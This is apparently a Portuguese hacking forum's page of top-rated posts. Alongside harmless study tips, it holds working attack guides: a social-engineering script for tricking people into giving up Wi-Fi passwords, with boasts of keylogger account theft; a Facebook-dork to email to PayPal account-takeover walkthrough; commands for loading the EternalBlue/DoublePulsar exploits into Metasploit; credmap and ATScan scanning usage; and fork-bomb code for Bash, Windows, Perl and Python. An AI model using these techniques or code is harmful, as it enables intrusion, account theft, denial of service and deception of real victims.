Ir para conteúdo

Tabela de Classificação


Conteúdo Mais Visto

Exibindo conteúdo com a maior reputação desde 24em todas áreas

  1. 7 pontos
    Olá Jovens, hoje irei compartilhar com vocês algo que aprendi em relação a Aprender! Todos que estão aqui estão à procura de algum tipo de conhecimento no mundo da Tecnologia, alguma linguagem de programação ou qualquer outra coisa. Muitos de nós e até eu há alguns tempos atrás "aprendia" de forma errada e hoje vou ajuda-los a aprender o conteúdo estudado. Teoria dos 70:20:10 ! A teoria dos 70:20:10 nasceu de um estudo que indica que: 10% do seu aprendizado em qualquer conteúdo são aulas teóricas, ou seja, algum livro que você baixa e lê, uma aula que você assiste ou um simples artigo. Muitas pessoas acham que estão aprendendo apenas por lerem um artigo ou alguma página de livro, você pode até por pouco tempo decorar, porém, irá esquecer logo mais. 20% são da interação e o compartilhamento de informações com demais pessoas que querem aprender determinado conteúdo, ou seja, temos o fórum, Aprendeu algo? Compartilhe! Ensine, você está beneficiando a você mesmo e aos demais. Mas não seja aquele chatão que fica o tempo todo enchendo o saco dos outros: "como faz isso, faz isso pra mim" Procure por conhecimento também, a opção de busca do fórum também ajuda muito, pois uma dúvida pode já ter sido respondida ou pode conter no Google! Use ele também ^^ 70% Vem da prática! Ohhh pratica! Assim que aprendeu algo, sempre pratique, treine contigo mesmo! Nas áreas de ferramentas aqui do fórum tem um tópico para testar habilidades hacker caso você estude isso, até mesmo você pode praticar jogando, sim, existem jogos para que você pratique o conteúdo aprendido. Lembre-se: Pratique muito até chegar a aprender! Algumas outras dicas: Defina objetivos: Sempre defina um objetivo, pois se não for definido um objetivo, você terá estudado algo em vão, ou seja, algo que não irá utilizar. Eu por exemplo, estou aprendendo linguagens C para poder aprender a programar um servidor de jogos baseado em Samp ( san andreas multiplayer ).1 Estude antes: Como assim estudar antes? É mais ou menos assim. Na hora de aprender irá surgir muitas dúvidas, é bom que antes de estudar, você tenha em mente o que irá estudar. Ou seja, apenas um resumo para depois se aprofundar no que for aprender. Leia ou Assista a Aulas: É muito importante que você adquira o conhecimento que quer aprender, seja lendo, assistindo aulas ou qualquer outra forma que você aprender a fazer algo. Para saber o que fazer na prática é preciso saber o que irá fazer na teoria, acredite! as duas coisas andam juntas. Pratique depois: É preciso que, depois de ter adquirido o conhecimento de forma teórica, ou seja, aprendido algo lendo ou assistindo alguma aula ou qualquer coisa parecido por em prática. Ou seja, aprendeu a fazer algo? Faça várias e várias vezes a mesma coisa até que possa aprender. Mas NÃO deixe de fazer ou praticar de vez em quando para que você não esqueça. Crie um exemplo: Vamos fazer um exemplo agora, digamos que você aprendeu uma forma de defesa contra um ataque hacker e você está sendo atacado e precisa por em prática o conteúdo em que aprendeu para poder se defender. Crie exemplos de situações em que seriam usados o conhecimento que você aprendeu para que você possa praticar dessa forma. Descanse: É muito importante que, depois de ter estudado e colocado em prática, descanse! Pois o seu cérebro irá relaxar e sugar o conhecimento aprendido e praticado. Repita: É como eu disse acima, nunca deixe de praticar e repetir o que aprendeu, repita várias e várias vezes. Dica de ouro: ENSINE! É uma dica que vale muito, quanto mais a gente tenta ensinar algo para outra pessoa e compartilha um conhecimento, mais a gente aprende! Aprendeu algo? Compartilhe com alguém, mesmo se for algo conhecido ou até mesmo "simples" poderá ajudar muitas pessoas assim como poderá ajudar a si mesmo! Espalhe conteúdo, temos nosso fórum para isso, ajuda muito a todos. Essas dicas irão ajudar muito, mais muito mesmo vocês, assim como me ajudou! Gostou de conteúdo? Achou útil? Te ajudou? Peço humildemente que me agradeça apenas fazendo isso:
  2. 6 pontos
    Sim, você leu certo. Imagine invadir contas bancarias através de informações postadas no Facebook. Não é novidade que usuários de redes sócias expõe seus dados para o publico. ANTES DE COMEÇAR O TUTORIAL QUERO QUE SAIBAM QUE TUDO QUE FOI CRIADO AQUI É FALSO (CONTAS E DADOS BANCÁRIOS). Vamos a pratica. Eu descobri esse método logo após uma atualização do Facebook, nela, você pode procurar quaisquer publicações. No meu exemplo de busca, buscarei por email + um site de banco. Podemos observar que, com uma simples busca + filtrar resultados, o próprio Facebook nos retornou o que queríamos. Nessa jogada de dork, já temos um perfil verdadeiro + email + detalhes de custo + sabemos que temos uma conta no paypal + detalhes extras. Com essas informações, o engenheiro social já pode atacar. Você ainda pode explorar o perfil, descobrindo o nome da mãe, cachorro, cidade natal, cidade de nascimento, data de aniversario e entre outras coisas. Partimos agora para os privilégios, exploração da conta do email. Sabemos que contas de correios eletrônicos tem falhas se forem mal configuradas. Irei mostrar isso em outro tutorial. Porem, usamos as informações obtidas coletadas da vida da vitima. Podemos adquirir acesso ao email descobrindo as principais perguntas de segurança. Nome da mãe, cidade que nasceu, professora da X serie e assim por diante. Existem VÁRIAS maneiras de se conseguir acesso a uma conta de email. Sabendo o login do email de alguém, você pode fazer um estrago. Agora que tenho acesso a conta de email, sem precisar de nenhuma senha, vamos redefinir a senha da conta do Paypal e ganhar acesso total. Solicitando a recuperação de senha e a alteração a configuração da conta, conseguimos total acesso a conta Paypal. Galera, sei que foi um tutorial rápido e sem muita pratica, mas queria mostrar mesmo a vocês o perigo de você ou os seus familiares postarem informações sigilosas em redes sociais, ou até mesmo, deixando o perfil aberto para o publico. Espero que vocês tenham gostado, e eu vou tentar trazer os principais "bypass" em contas de correiro eletrônico . Em caso de duvida, irei responder.
  3. 6 pontos
    Hoje trago a vocês um modulo desenvolvido a partir das ferramentas utilizadas pela NSA, foi apenas uma demonstração de como ela funciona, está falha está afetando diversas versões do Windows tornando-a uma grave falha para usuários do Windows, ela é executada junto com o processo do windows, variando a versão da arquitetura "x64 lsass.exe / x86 wlms.exe " com isso a modulo acaba gerando um backdoor diante desses processos, que acaba dificultando a visibilidade do backdoor, é acaba sendo quase "impossível" dele fechar o processo. Caso vocês se manifeste, irei fazer uma part.2 do video ensinando a adicionar o modulo é dando algumas dicas é explicações sobre a falha. VERSÕES AFETADAS 1 Windows XP (all services pack) (x86) (x64) 2 Windows Server 2003 SP0 (x86) 3 Windows Server 2003 SP1/SP2 (x86) 4 Windows Server 2003 (x64) 5 Windows Vista (x86) 6 Windows Vista (x64) 7 Windows Server 2008 (x86) 8 Windows Server 2008 R2 (x86) (x64) 9 Windows 7 (all services pack) (x86) (x64)
  4. 5 pontos
    Já imaginou o que fazer após invadir um computador?
  5. 4 pontos
    O ATScan é uma ferramenta escrita em Perl com a premissa de automatizar o scanning por Dorks do bing em determinados sites a procura de vulnerabilidades de XSS, Local File Inclusion e algumas outras funções específicas de frameworks como o Joomla. Ela é uma ferramenta bem performática e eu particularmente gostei muito, principalmente pela sua integração com o SQL Map.Primeiro vamos fazer o clone da ferramenta, dar permissão de execução e testar se a mesma vai rodar tudo limpo: # git clone https://github.com/AlisamTechnology/ATSCAN # cd ATSCAN/ # chmod +x atscan.pl # perl atscan.pl Efetuando o Scan de XSS em um site por meio de Bing DorksO ATScan trabalha por meio do buscador do bing, onde procura por diversos resultados e salva na memória ou em um arquivo txt, depois ele testa um por um procurando por vulnerabilidades de XSS e LFIPara não machucar ninguém, vamos utilizar como stage de teste o site testphp.vulnweb.com/Para realizar o Scan basta seguir os passos: [+] Please select a task: 1 # SEARCH ENGINE (BING) [+] Please enter your Dork: site:testphp.vulnweb.com # DORK QUE IREMOS UTILIZAR [+] Scan level: 100 # NUMERO DE RESULTADOS QUE QUEREMOS RETORNAR (DE 50 EM 50) [+] PROXY:: No! [+] SCAN LEVEL:: 100 [+] RANDOM SEARCH:: BING [bing.ca] [+] DORK:: site:testphp.vulnweb.com [ ] --------------------------------------------------------------------------- [+] Please wait... [!] [23:9:15] :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: [+] DORK:: site:testphp.vulnweb.com Após o término do Scan, será exibida a seguinte mensagem com o número de resultados encontrados dentro do domínio pela Dork. Veja que ele criou um log chamado Search_Scan.txt. Ele é importante, pois agora iremos realizar o teste de XSS e RFI com esses resultados. [!] 55 Unique Result(s) Found! [!] Results saved in /root/ATSCAN/Search_Scan.txt [!] [23:9:29] SCAN FINISHED! [+] Now You Want To Back To Menu (1) Or Exit (0) ? Volte ao menu inicial. Agora iremos prosseguir com a opção de SITE SCANNER [..][+] PRINCIPAL MENU ========================================= [+] 1 = SEARCH ENGINE (BING) [+] 2 = SITE SCANNER [+] 3 = SERVER SCANNER [+] 4 = MD5 / BASE 64 [+] 5 = TERMINAL [+] 6 = ABOUT [+] 7 = HELP [+] 8 = EXIT (->) ========================================= [+] Please select a task: 2 [..][+] SCAN SITES OPTIONS ========================================= [+] 1 = CHECK HTTPD VERSION [+] 2 = XSS SCAN [+] 3 = LFI SCAN [+] 4 = RFI SCAN (JOOMLA) [+] 5 = ADF SCAN (WORDPRESS) [+] 6 = FIND ADMIN PAGE [+] 7 = FIND SUBDOMAINS [+] 8 = BACK (<-) [+] 9 = EXIT (->) ========================================= [+] Select an option -> 2 [+] Do You Want To Scan a List? (Y/n): y [+] Enter List Name [Ex:list.txt]: Search_Scan.txt [+] PROXY:: No! [+] LIST:: Search_Scan.txt [!] TOTAL TARGETS IN LIST: 55 Result(s) Found in the List! [+] Please wait... Podemos ver que ele descartou todos os resultados que não responderam como o HTTP Response 200 e marcou como possíveis vulneráveis algumas das opções. Uma coisa muito banaca do ATScan é a integração com o SQLMap caso você o tenha instalado. Lendo todas as linhas do log de XSS criado e testando todas as possíveis opções. [!] 33 Unique Result(s) Found! [+] Results saved in /root/ATSCAN/XSS_Site_Scan.txt! [!] [23:18:15] SCAN FINISHED! [!] 33 Unique Result(s) Found! [+] Results saved in /root/ATSCAN/XSS_Site_Scan.txt! [!] [23:18:15] SCAN FINISHED! [+] Do You Want To sqlmap this Vulnerability? (Y/n): Vamos prosseguir com o SQLMap e TOR com os Scans. Caso queira prosseguir manualmente com as explorações construindo sua própria sintaxe do SQLMap, fique a vontade, como vimos, todos os resultados foram salvos no log XSS_Site_Scan.txt Realizando o teste de Local File Inclusion Para verificar vulnerabilidades de inclusão de files do servidor, basta seguir os mesmos passos do SITE SCANNER porém escolhendo a opção de LFI e apontando a mesma lista de URLs encontradas. Lembrando que nem o Nanoshots quando os desenvolvedores da ferramenta nos responsabilizamos pelo mau uso da mesma. UPDATE 02/02/2016 - ATScan Update version 5.3 Com essa nova versão, os comandos interativos acima pararam de funcionar e começaram a receber parsing da linha de comando no momento da execução. Nada muito complicado, eu pessoalmente prefiro assim. Muito boa a nova atualização Fazendo um scan simples com uma dork: # perl atscan.pl --dork site:testphp.vulnweb.com --level 50 O Scan ainda mantém os resultados da dork em um arquivo txt, portanto podemos realizar o teste de XSS e LFI diretamente desse arquivo criado: XSS Scan: # perl atscan.pl -t search.txt --xss LFI Scan: # perl atscan.pl -t search.txt --lfi XSS Scan + SQL Map com os resultados: # perl atscan.pl -t search.txt --xss --sqlmap Wordpress Finder - Encontrar Wordpress no Site: # perl atscan.pl -t search.txt --wp Wordpress Finder - Encontrar Joomla no Site: # perl atscan.pl -t search.txt --joom Email Scanner: # perl atscan.pl --dork site:testphp.vulnweb.com --sites --level 50 --email
  6. 4 pontos
    Github https://github.com/lightos/credmap Examples: ./credmap.py --username janedoe --email [email protected] ./credmap.py -u johndoe -e [email protected] --exclude "github.com, live.com" ./credmap.py -u johndoe -p abc123 -vvv --only "linkedin.com, facebook.com" ./credmap.py -e [email protected] --verbose --proxy "https://127.0.0.1:8080" ./credmap.py --load creds.txt --format "e.u.p" ./credmap.py -l creds.txt -f "u|e:p" ./credmap.py -l creds.txt ./credmap.py --list
  7. 4 pontos
    O Linux nos permite executar comandos que em outros Sistemas Operacionais não seria possível. Essa liberdade pode trazer algum desconforto se não soubermos usá-la corretamente. Portanto, é importante saber que existe alguns comandos que você nunca deve executar em seu terminal Linux, pois a consequências serão imensuráveis. As causas são irreparáveis, estando na lista danos ao sistema de arquivo, pane no sistema operacional (conhecido como “kernel panic”) e outros. Portanto preste atenção nos comandos listados abaixo: Comandos que irão deletar alguns (ou todos) arquivos do seu sistema: Comando que irá fazer você perder todos os privilégios de admin: By: Wheezy! ^^
  8. 4 pontos
    Engenharia social para conseguir wifi: Passo 1: Sondagem. Lembre-se engenharia social demanda conhecimento prévio da vitima, o que você precisar saber antes do ataque: - Onde fica o roteador? É no apartamento 1? Na loja do lado? No escritório do segundo andar? - Quantas pessoas vivem nesse local? Alguém lá entende de informática? - Que horas tem menos pessoas nesse local? Que horas a pessoa mais “frágil” (Manja nada de informática) está sozinha lá? (Em breve vou postar um tópico sobre escolher alvos, nem sempre o mais frágil é o que tem menos instrução, mulheres ou crianças, na maior parte dos meus ataques o mais frágil é o maridão, o paizão que pensa que sabe tudo, aquele que sempre concorda e acha que sempre soube daquilo). Passo 2: O ataque. Se prepare para os procedimentos, procura abordar em horários que vitima mais “frágil” está sozinha no local. Esse é o script padrão, estude a essência dele e adapte para sua situação. Dedo na campainha e lembre-se se você não se convencer, não vai conseguir convencer ninguém, Confiança e olhos firmes. (pratique no espelho ou procure no wikihow como exalar confiança ) Siga o script: Bom dia! Sou o Gabriel, da casa ao lado, meu telefone sem fio está com muito chiado e falhando, acho que ele está conflitando com seu roteador, sabe me informar qual frequência ele opera? 1 – Sim ele opera em 50 Ghz! E agora?? O que eu faço? Enfio o rabo entre as pernas e agradeço? – Não !- diga que já mudou essa frequência e não adiantou, pergunte sobre a banda da frequência. E siga usando banda da frequência no lugar de só frequência 2 – Não faço a menor ideia! Pois bem, conflitando com meu fone sem fio, minhas ligações caem e sua net fica mais lenta. Já tentei varias bandas inclusive troquei do meu roteador também ( Isso vai dar impressão de que você não precisa da net dela) ficou bem mais rápida, mas ai acho que conflitou com o seu, poderia ver lá para mim? Assim resolvo esse conflito, por favor, meu telefone está um caos! Observações: Se a vitima não manja “das computação”, ela vai perguntar o que tem a ver uma coisa com outra, você explica que net sem fio trabalha com frequência igual de radio, quanto tá na mesma frequência do telefone, o tel cai e a net fica lenta. Se a vitima manja, ela já sabe que interfere sim, se não souber vai pesquisar na net porque ele é um fução, então vai descobrir isso e pedir pra vc alterar. Nesse caso pode ser necessário entrar no ip do roteador, a senha wi-fi fica logo abaixo de onde fica a frequência, fique de olho. Ela vai dizer que não sabe ver a frequência e provavelmente vai pedir para você conferir pra ela, se não pedir peça para deixar você dar uma olhada, impossível ela negar, chegando no pc temos duas situações: 1° A vitima sai de perto. Ficou fácil clica com o direito no ícone wi fi, seleciona a rede dela, propriedades exibir caracteres. Pronto você já tem a senha. 2° A vitima fica do seu lado olhando pra a tela e vendo o que vc faz. Vamos ter que disfarçar, cmd no executar, vai abrir o prompt, digite ipconfig/all para exibir propriedades de rede, vai aparecer tanta letrinha que a vitima vai ficar confusa, diga “ Nossa o conflito é aqui mesmo, vou ver nas propriedades de rede” e na cara dura proceda como no passo anterior. Pode tentar entrar direto no admin do roteador e olhar por lá isso vai dar um tom mais profissional e dar mais confiança para vitima, assim você assegura futuros ataques. Pelo que você percebeu da vitima vai saber se ela vai tentar mudar a senha futuramente, se você fez com bastante confiança ela não vai e se precisar mudar vai chamar você para fazê-lo. ( você também pode olhar a senha do roteador dela caso ela mude ) Use a senha em horários que tenha pouca gente na casa de inicio, isso é para que a vitima não desconfie da lentidão da net. Depois de um tempo ou um mês, use a vontade. Informações pra você ficar mais confiante: Nunca errei esse ataque, nem quando era noob, sempre atingi o objetivo sem levantar suspeitas. Já apliquei em hospitais, hotéis, lojas, escritórios, o pior que aconteceu foi pedirem para eu voltar depois e conversar com o técnico, quanto falei com ele perguntei da banda ele disse “onde vejo isso?” eu disse me leva até o roteador que eu te mostro. Hoje consigo fazer isso por telefone, faço a vitima me ditar a senha, mas isso requer pratica, se você já tem, vai ser fácil, se não tem basta praticar ou pedir uma ajuda nos comentários que vou te ajudar. Esse exercício é básico, não requer tanta habilidade, pode testar em localidades desconhecidas até conseguir fazer com perfeição. Sim o post fica longo mesmo, tentei fazer resumido, mas quis colocar algumas hipóteses que possam atrapalhar então me desculpem. Se se deparou com algo incomum no seu ataque, por favor, poste ou me mande mensagem é muito importante para meus estudos. E este é para conseguir a senha de alguma empresa por telefone: Liguei de um orelhão e me identifiquei como funcionário da GVT do setor de qualidade, e perguntei como estava a velocidade da conexão nos últimos dias, e é claro que reclamaram, principalmente que esta empresa não possui um técnico de TI in loco. Para conseguir segui as etapas: Pedi que desliga-se o modem por 1 minuto; Pedi a identificação do aparelho; Pedi o código impresso em cima do aparelho, para que eu pudesse aumentar a velocidade para o dobro para amenizar os problemas enfrentados; O código recebido era a senha da rede …. Passei um numero de protocolo falso; Eu não manjo muito de hacking no pc, é bem mais facil pra mim, que não possuo conhecimento em progamação, usar engenharia social e abusar da confiança alheia pra conseguir as coisas já consegui muitos face/insta de pessoas "famosas" só com o celular, o famoso keylogger, que apesar de simples é uma arma muito boa quando você é um bom manipulador
  9. 4 pontos
    Manter contato visual é essencial para manter a atenção de uma pessoa em você. Exercício: - Vamos criar o hábito de olhar nos olhos. Amanhã, durante todo o seu dia, você vai olhar nos olhos de cada pessoa que passe por você, que interaja com você, e vai falar em sua mente a cor dos olhos dela. Pegaram? Olhar nos olhos e falar mentalmente a cor dos olhos dessa pessoa. Faça isso durante todo o seu dia, todos os dias, até entrar no automático.
  10. 4 pontos
    TUTORIAL BY SPOOK FSOCIETY BRASIL COMPARTILHANDO SEMPRE CONHECIMENTO. Vamos começar . Crie uma partição em FAT32 no seu HD, de 5 GB. Após isso extraia a iso do OS que deseja iniciar o boot e coloque dentro da partição criada. (NÃO ESQUEÇA DE GRAVAR A LETRA DA UNIDADE DA QUAL A PARTIÇÃO FOI CRIADA) Logo depois, abra seu CMD em modo administrador e execute o comando > bcdedit (IRÁ APARECER A SEGUINTE TELA) No carregador de Inicialização do Windows observe o IDENTIFICADOR no meu caso está {default} mas pode está outra coisa como {corrent} no qual estiver no seu anote, iremos utilizar agora no proximo comando, digite: > bcdedit /copy {default} (ou qual estiver no seu) /d "WindowsBOOT" Após ter executar esse comando irá aparecer um tela semelhante a essa que resultará nesse código, anotem ele usaremos para o próximo comando digite: > bcdedit /set {33edab00-2ac3-11e7-afbc-80ee73102b66} device partition=D: (lembram da letra da unidade criada que eu mandei anotar, então usaremos no meu foi D:) ( USE O CÓDIGO DADO A VOCÊ, ESSE É O MEU ^ ) Depois digite: > bcdedit /set {SEU CÓDIGO} detecthal on > bcdedit /set {SEU CÓDIGO} description "WindowsBOOT" > bcdedit /set {SEU CÓDIGO} osdevice partition=D: (lembram da letra da unidade criada que eu mandei anotar, então usaremos no meu foi D:) Pronto partição bootável criada, agora ensinarei a usar ela de maneira boot, já que por ser uma partição de seu próprio HD interno, não dará para selecionar como se fosse uma simples mídia (usb ou dvd), então reiniciem o computador. E verá um dualboot(quase isso) após selecione o boot que você criou o "WindowsBOOT" depois que carregar escolha a opção do teclado e avance, em alguns aparecem uma verificação de erro se no seu aparecer, clique em cancelar e confirme o cancelamento, agora clique em "view advanced..." na segunda opção, escolha o nome do seu usuário, as vezes é o primeiro que aparece, depois disso insira sua senha(se tiver) e clique em OK. Agora clique em CMD e digite o seguinte comando: > notepad Irá executar o bloco de notas, você vai em file > open, vai em "file of type" na segunda caixa abaixo , no centro escolha all files clique agora no lado esquerdo em "computador" veja qual é a letra da partição de 5 GB que você criou pra usar como boot na parte de cima também tem a letra da unidade deve conter os arquivos de instalação do windows / windows install files entre na partição criada e clique com botão direito do mouse no executável de instalação do OS vai em "open" agora você já pode iniciar a instalação do windows ou o OS de sua prferência . Até a próxima .
  11. 3 pontos
    Tudo bem que é sexta-feira, dia de maldade, mas vamos com calma.
  12. 3 pontos
    ESCALANDO PRIVILÉGIOS com EXPLOIT DIRTY COW A escalação de privilégios, é uma técnica a qual um hacker/cracker invade o sistema e utiliza de exploits ou PoCs (Proof of Concept) para ganhar acessos administrativos ou seja, acessos de superusuarios independente do sistema. Hoje eu trago pra vocês, uma demonstração de uma escalada de privilégios através do exploit Dirty Cow.
  13. 3 pontos
    Estudo Pentest totalmente em Português-Br Web Penetration Testing - Kali Linux (PT-BR).pdf
  14. 3 pontos
    Introdução Conhecido principalmente por usuários do sistema operacional Linux, ForkBomb é um DOS (denial of service), Seu principal objetivo é auto replicar infinitamente até esgotar todos os recursos do sistema. Um ForkBomb funciona criando um processo e se replicando muito rapidamente, com a finalidade de saturar o espaço disponível na lista de processos mantidos pelo sistema operacional. Se a tabela de processo ficar saturada, nenhum novo programa pode ser iniciado. Na medida que o código vai se auto replicando, consome cada vez mais recursos do sistema, como memória, processamento etc. Como o sistema não tem recursos infinitos acaba entrando em colapso. O ForkBomb faz uso de uma operação nativa do sistema (chamado de fork) no qual um processo em execução poderá criar novos processos. Muita gente pensa que isso é um problema somente do Linux, mas na realidade qualquer sistema operacional que contenha a função fork ou equivalente, está sujeito a esse tipo de problemas (paralização do SO), Obviamente que o Windows também não escapa disso, com um arquivo .bat poderíamos obter o mesmo efeito, a diferença é que no Linux pode ser evitado. Criando um ForkBomb Na maioria das vezes você não precisa de permissões superuser para criar e executar um ForkBomb na sua máquina, Varia Bastante de Sistema. Atenção: os Códigos a Seguir PODEM DANIFICAR O SEUSISTEMA, Seja Responsável na hora de usar. Linux No terminal digite: :(){ :|: & };: Explicando: :() -> cria uma função chamada ‘:’ { -> Começo do que fazer quando executarmos a função ‘:’ -> cria mais uma função chamada ‘:’ | -> direciona a função ‘:’ para uma nova função que será criada chamada ‘:’ -> cria o processo ‘:’ que o processo anterior ‘|’ direcionou & -> rejeitar funções de morte, se o primeira função ‘:’ é morta, todas as funções que ele replicou não deve ser auto-mortas } -> Fim do que fazer quando executarmos a função ‘:’ ; -> funciona como separador equivale a um && de terminal e permite iniciar uma nova instrução -> executa a função criada no início Windows Crie um arquivo .bat com o seguinte código: :bomb start %0 goto bomb Ou somente: %0|%0 -É possível fazer também em linguagem de programação: Perl perl -e “fork while fork” & Python import os while(1): os.fork() Você pode ver em outras linguagens no link: https://pastebin.com/HnhXcvsg Desarmando um ForkBomb Uma forma simples de desarmar uma ForkBomb é com o comando Kill no Linux (em ambientes gráficos o xkill) Outra forma é fazer uma reinicialização forçada da máquina, o que não é recomendado pois existe o risco de perder dados importantes e corromper arquivos fundamentais do sistema. Prevenindo-se: Uma forma de prevenir um ForkBomb é limitando a quantidade de processos que podem ser iniciados, uma das formas de fazer isso é com o unlimit: Podemos então limitar o uso de processos dos usuários com um simples: Unlimit -u 500 Conforme o Código acima o usuário está limitado a abrir até 500 processos simultaneamente. Tome cuidado ao reduzir o número de processos. Um valor muito baixo pode simplesmente inviabilizar o uso. Algumas opções do comando Unlimit -a: mostra os limites correntemente aplicados -f: tamanho maximo de cada ficheiro em blocos de 512 bytes -n: numero maximo de filedescriptor + 1 -s: Stack em Kbytes -t: tempo de CPU em segundos -v: tamanho maximo de memoria virtual em Kbytes. -m: tamanho maximo de memoria -u: numero maximo de processos -S: Impoe o soft limit -H: Impoe o hard limit Você pode ver mais opções de comandos unlimit no link: https://pastebin.com/2QYnfbsG By: WHEEZY
  15. 3 pontos
    Esse artigo é uma resposta para os muitos que me perguntam do porquê eu não acreditar em "ficar anônimo". O simples fato de eu estar aqui nessa postagem escrevendo essas palavras, já faz de mim um alvo. "Ah, mas eu uso Proxy da Russia, Tor e 20 VPNs" É mesmo? E me diga. Antes de conectar nos seus proxys, Tor e VPNs, sua conexão se originou de onde? Da lua? Eu acho que não. O que eu quero dizer, é que não adianta, para se utilizar os meios que te deixam "anônimos" você tem que partir da sua identidade real antes. Em uma investigação policial, um dos primeiros passos - e mais importantes - é separar suspeitos. Pois bem. Digamos que eu seja da NSA e eu tenho que investigar um servidor hospedado na Russia, que contém arquivos ilegais (de qualquer tipo). Por onde devo começar? Obviamente por todas as conexões externas que fizeram alguma requisição para entrar em uma segunda rede que direcione para a rede Russa. Depois você teria uma lista (grande) de suspeitos, que facilmente poderia filtrar se baseando em histórico na internet e no meio social. "Ah, mas isso dá trabalho pra caramba, deve levar 1000 anos." Mais uma vez eu digo. Nós gastamos 1,200 reais no nosso aparelho de "Hackinagem". Os órgãos governamentais gastam bilhões de dólares, quem você acha que vai se dar bem? Sem contar que especificamente os USA, tem a própria NASA que desenvolve tecnologias muitas vezes fictícias a nossos olhos. Tecnologias que são novidades para nós, população, já foram inventadas/descobertas a muitos anos por organizações como a NASA. Para que você entenda que o simples fato de estar conectado na internet, já acaba com qualquer chance de ser anônimo, recomendo ler esse artigo sobre alguns documentos vazados pelo Sr. Snowden. CLIQUE AQUI Vale lembrar que são documentos vazados, pare para pensar em tudo que nós não sabemos, que está escondido.
  16. 3 pontos
    Legal, isso facilita muito quando você está na rua e quer dar uma olhadinha no fórum
  17. 2 pontos
    Hoje precisei desconectar dispositivos do meu WI-FI e tive dificuldade em saber o modelo do dispositivo pelo endereço físico... pesquisando, encontrei um site que creio eu seja útil, é um site que mostra o modelo da placa de rede do dispositivo via endereço físico, assim, facilitando pra quem quer fazer o mesmo que eu ou outras coisas... logo abaixo o site que eu usei. http://curreedy.com/stu/nic/
  18. 2 pontos
    Em março deste ano, a WikiLeaks criou um projeto chamado Vault7, tendo como foco o vazamento de arquivos da CIA. O projeto é conhecido por ser a maior série de publicações de documentos confidenciais da agência. São mais de 8.000 documentos vazados somente na primeira etapa do projeto, sendo tal parte chamada de "Year Zero", inclusive, contendo documentos sobre partidos políticos e candidatos franceses na eleição presidencial de 2012. Não é segredo para ninguém que a CIA, recentemente, perdeu o controle do seu arsenal hacker (contendo desde códigos, até aos documentos oficiais dos mesmos). Essa enorme coleção hacking equivale a várias e várias centenas de milhões de linhas de códigos (eu particularmente, não consigo imaginar o quão enorme é este arsenal). Diz a lenda que o vazamento ocorreu entre os hackers ativos e inativos (tanto da agência, quanto do governo americano). Bom. De acordo com os artigos que eu li, as ferramentas são amplas e possui uma gama de variedade, como um arsenal para invasões: televisões smarts, produtos da Apple, drones, mísseis, até mesmo um conjunto de ferramentas para hackear seu principal rival burocrático, a NSA. Bom... Isso é tudo, pessoal.
  19. 2 pontos
    Opa pessoal, é meu primeiro tópico aqui no forum, então desculpa qualquer coisa Galera, esse tutorial vai ser dividido em 2 partes, essa primeira parte é onde você vai adicionar tudo que é preciso pra explorar a falha... Recentemente, algumas ferramentas da NSA foram vazada por um grupo de hackers denominados The Shadow Brokers, entre elas estão dois exploits voltado para sistemas Windows, o primeiro denominado Eternalbue e o segundo DoublePulsar . O Eternalblue explora uma vulnerabilidade de execução remota de código nos protocolos SMBv1 e NBT sobre as portas TCP 445 e 139 respectivamente. Já o DoublePulsar é usado para injetar arquivos DLL's juntamente com um payload. Até agora as versões que são afetadas pelo exploit... 1 Windows XP (all services pack) (x86) (x64) 2 Windows Server 2003 SP0 (x86) 3 Windows Server 2003 SP1/SP2 (x86) 4 Windows Server 2003 (x64) 5 Windows Vista (x86) 6 Windows Vista (x64) 7 Windows Server 2008 (x86) 8 Windows Server 2008 R2 (x86) (x64) 9 Windows 7 (all services pack) (x86) (x64) Bom, hoje venho trazer pra vocês um tutorial pra adicionar os exploits ao Metasploit... Então vamos lá.... .: Requisitos :. Metasploit Wget Git .: Adicionando os exploits no Metasploit :. 1. Primeiramente vamos ter que adicionar os 2 exploits ao Metasploit e um módulo auxiliar, é rápido e facil... Segue aí 1.1 Vamos baixar primeiramente o módulo auxiliar que vai nos ajudar a verificar se o nosso alvo é vulnerável ao MS17-010 e adicioná-lo ao nosso Metasploit. wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb 1.2 Depois de baixado o arquivo, você deverá movê-lo para a pasta /modules/auxiliary/scanner/smb/ no caminho de instalação do seu metasploit... No meu sistema ele se encontra em /opt/metasploit/, no meu caso vai ficar dessa forma... # mv smb_ms17-010.rb /opt/metasploit/modules/auxiliary/scanner/smb/ 1.3 Agora vamos baixar os exploits \o/!!!! git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git 1.4 Depois de baixado o repositório, vamos colocar os arquivos dos exploits no nosso querido metasploit . Para adicionar é o mesmo processo anterior, só que vamos mudar apenas o caminho que será agora /modules/exploits/windows/smb/ OBS: Vamos copiar apenas o eternalblue_doublepulsar.rb e a pasta deps # cd Eternalblue-Doublepulsar-Metasploit # mv deps eternalblue_doublepulsar.rb /opt/metasploit/modules/exploits/windows/smb/ Finish!!! Já está tudo pronto para a próxima fase UHUUUUUUUUU \o/ Por Hoje é só galera, no próximo post irei ensinar a vocês a explorar a falha... Abraço !!!!
  20. 2 pontos
    Não entendi. Você entrou em contradição. Se você sabe que deve estudar desde os princípios básicos, por que está querendo ir direto para as técnicas? Você só estará utilizando ferramentas sem saber o que está fazendo... E o pior: você será só mais um ''harvester'' e não saberá resolver as falhas encontradas (pressuponho que não queira praticar crimes). Você sabe a diferença de um Hub, Switch e Roteador? Você conhece TODAS as máscaras possíveis para dividir uma rede IP em uma sub-rede? Você sabe calcular sub-redes e entende o que é redes IPv4 e IPv6? Sabe interpretar o código abaixo? router(config)#interface loopback 0 router(config-if)#ip address 172.16.1.1 255.255.255.255 router(config-if)#end router# Olha que essas perguntas são básicas para uma invasão de redes... Eu entendo que este fórum é para disseminar conhecimentos, mas você pelo menos precisa ser humilde o suficiente para subir os degraus necessários. É como eu querer ensinar cálculo diferencial para você, sem você ter o conhecimento básico de álgebra (como polinômios) e funções. Não me leve a mal, eu apenas sou a favor das pessoas saberem o que está fazendo. Como você deve saber, a comunidade em que estamos, odeia lammers.
  21. 2 pontos
    >> Fui no www.google.com.br >> Digitei "WannaCry" >> Cliquei no Wikipédia >> https://pt.wikipedia.org/wiki/WannaCry Atente-se para a regra número 1... Ou acabará sendo banido.
  22. 2 pontos
